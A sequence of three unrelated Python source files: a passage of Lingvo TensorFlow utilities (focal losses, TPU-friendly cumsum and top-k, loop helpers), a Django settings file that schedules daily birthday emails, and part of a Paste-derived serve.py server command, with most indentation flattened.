labels=label_ids, logits=logits)
if gamma is not None and gamma != 0:
probs = tf.exp(-loss)
loss *= tf.pow(1.0 - probs, gamma)
if alpha is not None:
loss *= tf.gather(alpha, label_ids)
return loss
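# Illustrative sketch (not part of the original module): softmax focal loss
# over three classes with sparse integer labels. The alpha/gamma values are
# arbitrary example choices.
def _ExampleSoftmaxFocalLoss():
  logits = tf.constant([[2.0, 0.5, -1.0],
                        [0.1, 0.2, 0.3]])
  label_ids = tf.constant([0, 2], dtype=tf.int32)
  alpha = tf.constant([0.25, 0.25, 0.5])
  return SoftmaxCrossEntropyFocalLoss(
      logits, label_ids=label_ids, alpha=alpha, gamma=2.0)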
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
u"""Focal loss for binary (sigmoid) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the sigmoid logistic regression.
labels: [..., C]. 0/1 labels.
alpha: The weighting factor alpha. Eq (3) in [1].
gamma: Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
# [1] Eq (4).
#
# The numerically-stable way to compute
# log(p) for positives;
# log(1 - p) for negatives.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
if gamma is not None and gamma != 0:
# The modulating factor. Note that
# (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ, for positives.
# pˠ = [σ(x)]ˠ, for negatives.
loss *= tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
if alpha is not None:
# [1] Eq (3)
loss *= (alpha * labels + (1 - alpha) * (1 - labels))
return loss
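# Illustrative sketch (not part of the original module): the sigmoid variant
# with dense 0/1 multi-label targets. alpha and gamma are arbitrary choices.
def _ExampleSigmoidFocalLoss():
  logits = tf.constant([[1.2, -0.7], [0.3, 2.1]])
  labels = tf.constant([[1.0, 0.0], [0.0, 1.0]])
  return SigmoidCrossEntropyFocalLoss(logits, labels, alpha=0.25, gamma=2.0)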
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z]+):(.*)')
def RecordFormatFromFilePattern(file_pattern):
"""Return the record format string for a Lingvo file pattern.
Lingvo file patterns take the form of:
tfrecord:/path/to/bar -> tfrecord is the record_format.
This function takes a file pattern and returns a string indicating
which format the filepattern implies.
Args:
file_pattern: String file pattern.
Returns:
Tuple (string, string):
- record_format: String record format, e.g., "tfrecord", etc.
- file_pattern: The file pattern without any prefixes.
"""
result = re.match(_RECORD_FORMAT_RE, file_pattern)
if result is None:
# TODO(vrv): Fix all callers so that file_pattern must contain
# the record format prefix.
return 'sstable', file_pattern
# regexp ensures that a match implies there are two groups:
# the record format and then the file pattern.
return result.groups()
def ReadFileLines(file_path):
"""Read a text file and return the lines.
If the file cannot be found at the given path, attempt to load it from the
Lingvo package (useful for data dependencies in par files).
Args:
file_path: path to file, either absolute or relative to the bazel workspace.
Returns:
A list of lines from the file.
"""
if not tf.io.gfile.exists(file_path):
try:
lines = pkgutil.get_data(
'lingvo', file_path.replace('lingvo/', '',
1)).splitlines(True)
except IOError:
# If pkgutil can't find the file, continue and let GFile raise the error.
lines = None
else:
lines = None
if not lines:
with tf.io.gfile.GFile(file_path, 'r') as f:
lines = f.readlines()
return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False):
"""A TPU efficient implementation of tf.cumsum().
This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
the axis dimension is very large. The current Tensorflow implementation is
based on scanning and reducing which is not efficient on TPU.
Args:
x: An input Tensor.
axis: An int for the axis.
exclusive: A bool for performing exclusive cumsum.
Returns:
A Tensor of the same shape as x.
Raises:
ValueError: if the input axis is invalid.
"""
if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
# Fallback to tf.cumsum when inputs are not floats or not running on TPU.
return tf.cumsum(x, axis=axis, exclusive=exclusive)
rank = GetRank(x)
# Needs to know the rank for the final transpose if axis is not the last
# dimension. Otherwise, falls back to tf.cumsum.
if not isinstance(rank, int) and axis != -1:
return tf.cumsum(x, axis=axis, exclusive=exclusive)
if axis < -1:
if axis + rank < 0:
raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
axis += rank
length = GetShape(x)[axis]
my_range = tf.range(length)
comparator = tf.less if exclusive else tf.less_equal
mask = tf.cast(
comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
x.dtype)
result = tf.tensordot(x, mask, axes=[[axis], [0]])
if axis != -1 and axis != rank - 1:
result = tf.transpose(
result,
list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
return result
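# Illustrative sketch (not part of the original module): off TPU, CumSum simply
# falls back to tf.cumsum, so this computes a running sum along the last axis.
def _ExampleCumSum():
  x = tf.constant([[1., 2., 3.],
                   [4., 5., 6.]])
  # Evaluates to [[1, 3, 6], [4, 9, 15]].
  return CumSum(x, axis=-1)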
def ProjectLastDim(inputs, weight, input_dim, output_dim):
"""Linear projection on the last dim of the input tensor.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], input_dim),
assert_equal(GetShape(weight)[-1], output_dim)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = tf.matmul(inputs, weight)
else:
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
else:
outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
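# Illustrative sketch (not part of the original module): projecting the last
# dimension of a rank-3 tensor with a [input_dim, output_dim] weight matrix.
def _ExampleProjectLastDim():
  inputs = tf.ones([2, 7, 16])      # [batch, time, input_dim]
  weight = tf.ones([16, 32]) * 0.1  # [input_dim, output_dim]
  # The result has shape [2, 7, 32].
  return ProjectLastDim(inputs, weight, input_dim=16, output_dim=32)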
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
"""Hacks to replace certain unwanted tensorflow ops."""
  # TODO(zhifengc/huangyp): Consider implementing an assert_equal op
  # replacement for lingvo, since assert_equal doesn't support strings on GPUs.
# Hack to replace tf.assert_equal
# TODO(b/136040013): Remove this after migration to tf.function.
if remove:
saved_assert_equal = tf.check_ops.assert_equal
# pylint: disable=unused-argument
def NoOP(*args, **kwargs):
return tf.no_op()
# pylint: enable=unused-argument
tf.check_ops.assert_equal = NoOP # Make assert_equal a no op.
yield
tf.check_ops.assert_equal = saved_assert_equal
else:
yield
def _DefineDefun(fwd, bak, args):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
bak: A callable xs, ys, dys: Nested Structure -> dxs: Nested Structure. The
custom backprop function for fwd.
args: A Nested Structure of tf.Tensor.
Returns:
A NestedMap w/ fields:
    defun: A tf.Defun that wraps fwd.
args: A Nested Structure of tf.DType
rets: A Nested Structure of tf.DType
"""
assert fwd is not None
# fwd signature (tf.Tensor dtypes).
get_dtype = lambda x: x.dtype
sigs = NestedMap(args=Transform(get_dtype, args))
get_shape = lambda x: x.shape
arg_shapes = Transform(get_shape, args)
compiled = use_xla()
noinline = not compiled
def Backward(op, *args):
assert bak is not None
xs = Pack(sigs.args, op.inputs)
# Note: sigs.rets will be set during the Forward call.
ys = Pack(sigs.rets, op.outputs)
dys = Pack(sigs.rets, args)
with RemoveAssertContext(remove=noinline):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
@tf.Defun(*Flatten(sigs.args), python_grad_func=Backward, noinline=noinline)
def Forward(*args):
for arg, shape in zip(args, Flatten(arg_shapes)):
arg.set_shape(shape)
with RemoveAssertContext(remove=noinline):
rets = fwd(Pack(sigs.args, args))
sigs.rets = Transform(get_dtype, rets)
return Flatten(rets)
sigs.defun = Forward
return sigs
def CallDefun(fwd, bak, args):
"""Wraps fwd in a defun with custom gradient bak and calls it with args.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
bak: A callable xs, ys, dys: Nested Structure -> dxs: Nested Structure. The
custom backprop function for fwd.
args: A Nested Structure of tf.Tensor.
Returns:
A Nested Structure equivalent to what fwd(args) computes.
"""
sigs = _DefineDefun(fwd, bak, args)
flat_rets = sigs.defun(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
return Pack(sigs.rets, flat_rets)
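# Illustrative sketch (not part of the original module): wrapping a squaring
# function in CallDefun with a hand-written backward rule. The field names
# (`x`, `y`) are arbitrary.
def _ExampleCallDefun():
  def Fwd(xs):
    return NestedMap(y=tf.square(xs.x))
  def Bak(xs, ys, dys):
    del ys  # unused; d/dx x^2 = 2x
    return NestedMap(x=2.0 * xs.x * dys.y)
  return CallDefun(Fwd, Bak, NestedMap(x=tf.constant(3.0)))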
def _Itype():
"""Loop iterator data type."""
return tf.int32 if use_xla() else tf.int64
def WhileLoop(cond, body, loop_state):
"""Helper to construct a while loop.
Args:
cond: A callable NestedMap -> tf.bool.
body: A callable NestedMap -> NestedMap.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(loop_state=loop_state)
dtypes = state.Transform(lambda x: x.dtype).Flatten()
@tf.Defun(*dtypes)
def LoopCond(*args):
s = state.Pack(args)
return cond(s.loop_state)
@tf.Defun(*dtypes)
def LoopBody(*args):
s = state.Pack(args)
s.loop_state = body(s.loop_state)
return s.Flatten()
return state.Pack(
tf.While(input_=state.Flatten(), cond=LoopCond, body=LoopBody)).loop_state
def ForLoop(body, start, limit, delta, loop_state):
"""Helper to construct a for loop.
Args:
body: A callable (tf.int, NestedMap) -> NestedMap.
start: Loop variable's initial value.
limit: Loop variable's limit value.
delta: Loop variable's change per iteration.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(
iter=tf.cast(start, _Itype()),
limit=tf.cast(limit, _Itype()),
delta=tf.cast(delta, _Itype()),
loop_state=loop_state)
def LoopCond(state):
return tf.less(state.iter, state.limit)
def LoopBody(state):
state.loop_state = body(state.iter, state.loop_state)
state.iter = tf.add(state.iter, state.delta)
return state
return WhileLoop(LoopCond, LoopBody, state).loop_state
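# Illustrative sketch (not part of the original module): summing the integers
# 0..9 with the functional ForLoop helper.
def _ExampleForLoop():
  def Body(i, state):
    state.total = state.total + tf.cast(i, tf.float32)
    return state
  init = NestedMap(total=tf.constant(0.0))
  # Runs Body for i = 0, 1, ..., 9; the returned `total` evaluates to 45.0.
  return ForLoop(Body, start=0, limit=10, delta=1, loop_state=init).total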
def TopK(x_in, k):
"""Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
assert k <= 2, 'This implementation is only efficient for small k.'
# TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
# 2d tensor, then call tf.math.top_k, and then reshape back.
x_in_shape = x_in.shape
x_rank = x_in_shape.rank
assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
last_dim_size = x_in_shape.as_list()[x_rank - 1]
min_value = tf.math.reduce_min(x_in) - 1.0
out_indices = []
out_values = []
for unused_i in range(k):
index_i = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
mask_i = tf.one_hot(index_i, last_dim_size)
# TODO(yonghui): Would tf.gather be more efficient and numerically stable
# here?
value_i = tf.reduce_sum(mask_i * x_in, -1, keepdims=True)
x_in = (1.0 - mask_i) * x_in + mask_i * min_value
out_indices.append(tf.expand_dims(index_i, -1))
out_values.append(value_i)
if k == 1:
return out_values[0], out_indices[0]
else:
return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
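# Illustrative sketch (not part of the original module): taking the top-2
# values and their indices along the last dimension.
def _ExampleTopK():
  x = tf.constant([[0.1, 0.7, 0.2],
                   [0.9, 0.3, 0.5]])
  # values -> [[0.7, 0.2], [0.9, 0.5]]; indices -> [[1, 2], [0, 2]].
  values, indices = TopK(x, k=2)
  return values, indices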
def ReadVariable(var_op):
"""Returns the value of the given variable operation.
Args:
var_op: The variable's TF `Operation`. It could be one of VarHandleOp,
Variable and VariableV2.
Returns:
A `Tensor` containing the value of the variable.
"""
if var_op.type == 'VarHandleOp':
# Filter out the ReadVariableOps that have control dependencies to avoid
# side-effects when the user runs it.
filter_fn = lambda op: op.type == 'ReadVariableOp' and not op.control_inputs
var_readers = list(filter(filter_fn, var_op.outputs[0].consumers()))
assert var_readers
return var_readers[0].outputs[0]
assert var_op.type in ['Variable', 'VariableV2']
return var_op.outputs[0]
|
settings_20210906114827.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task to run once a day at the time configured below
schedule.every().day.at("11:50").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(60)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE decrease_day_count_and_send_bday_mails ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
serve.py
|
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out unneeded functionality.
# All top level imports from each package moved here and organized
from __future__ import absolute_import
from __future__ import print_function
import atexit
import errno
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import textwrap
import threading
import time
from logging.config import fileConfig
from six.moves import configparser
from .loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
try:
_ = optparse._
except AttributeError:
from gettext import gettext as _
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
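# Illustrative sketch (not part of the original serve module): BoolOptionParser
# lets a boolean long option also take an explicit value, e.g. --daemon=false.
# The --daemon flag below is a made-up example option.
def _example_bool_option_parser():
    parser = BoolOptionParser()
    parser.add_option('--daemon', action='store_true', dest='daemon',
                      default=False)
    options, _ = parser.parse_args(['--daemon=false'])
    # The explicit 'false' value prevents the flag from being set.
    return options.daemon  # False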
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault(object):
pass
# run and invoke methods moved below ServeCommand
class Command(object):
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args = None
min_args_error = 'You must provide at least %(min_args)s arguments'
required_args = None
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if os.environ.get('PASTE_DEFAULT_QUIET'):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' ' + self.usage
else:
usage = ''
self.parser.usage = "%%prog [options]%s\n%s" % (
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '%s %s' % (os.path.basename(sys.argv[0]), self.command_name)
########################################
# Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' ' * (length - len(s))
else:
return ' ' * (length - len(s)) + s
def standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if sys.platform != 'win32' or ' ' not in arg:
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
def parse_vars(self, args):
"""
        Given variable assignments like ``['a=b', 'c=d']``, return
        ``{'a': 'b', 'c': 'd'}``.
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
        Set up logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = configparser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
def run(self, args):
print('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
        known = sorted(commands.items())
        if not known:
            print('No commands registered.')
            print('Have you installed Paste Script?')
            print('(try running python setup.py develop)')
            return 2
        print('Known commands:')
        longest = max([len(n) for n, c in known])
        for name, command in known:
            print(' %s %s' % (self.pad(name, length=longest),
                              command.summary))
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if self.args and self.args[0] in self.possible_subcommands:
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False) and
getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print('Running reloading file monitor')
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
print("Could not stop daemon")
# It's ok to continue trying to restart if stop_daemon returns
# a 1, otherwise shortcut and return.
if cmd == 'restart' and result != 1:
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
